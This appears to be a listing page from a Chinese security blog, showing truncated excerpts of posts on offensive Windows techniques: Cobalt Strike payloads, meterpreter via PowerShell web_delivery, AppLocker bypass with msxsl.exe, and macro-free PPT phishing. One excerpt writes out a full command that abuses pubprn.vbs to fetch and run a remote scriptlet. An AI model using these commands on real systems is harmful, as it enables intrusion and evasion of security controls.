in 奇技淫巧

为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图: PS: meterpreter会话是通过powershell web_delivery获取的 尝试创建文件夹成功: 将文件上传至特殊目录:...

in 技术分享奇技淫巧

远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/...

in 技术分享工具收集

$ie = New-Object -Com internetExplorer.Application $ie.Navigate("https://site.com/somefile") #------------------------------ #Wait for D...

in 技术分享工具收集奇技淫巧

关于XSLT之前已经有几篇文章进行介绍了,Hack With XSLT,XXE with XSL,Xsl Exec Webshell ,今天分享一个通过MSXSL.exe绕过Applocker的方法。 msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaS...

in 技术分享奇技淫巧

之前出现了一种新型的钓鱼攻击的手法,即通过PPT在未开启宏的情况下,执行程序,关于这个Freebuf也有相关文章进行介绍,《新型PPT钓鱼攻击分析》,《无需宏,PPT也能用来投递恶意程序》。但是文中都未介绍怎么制作这种文件,所以,今天在这里分享一下制作该文件的方法,希望大家了解并对此进行防御。...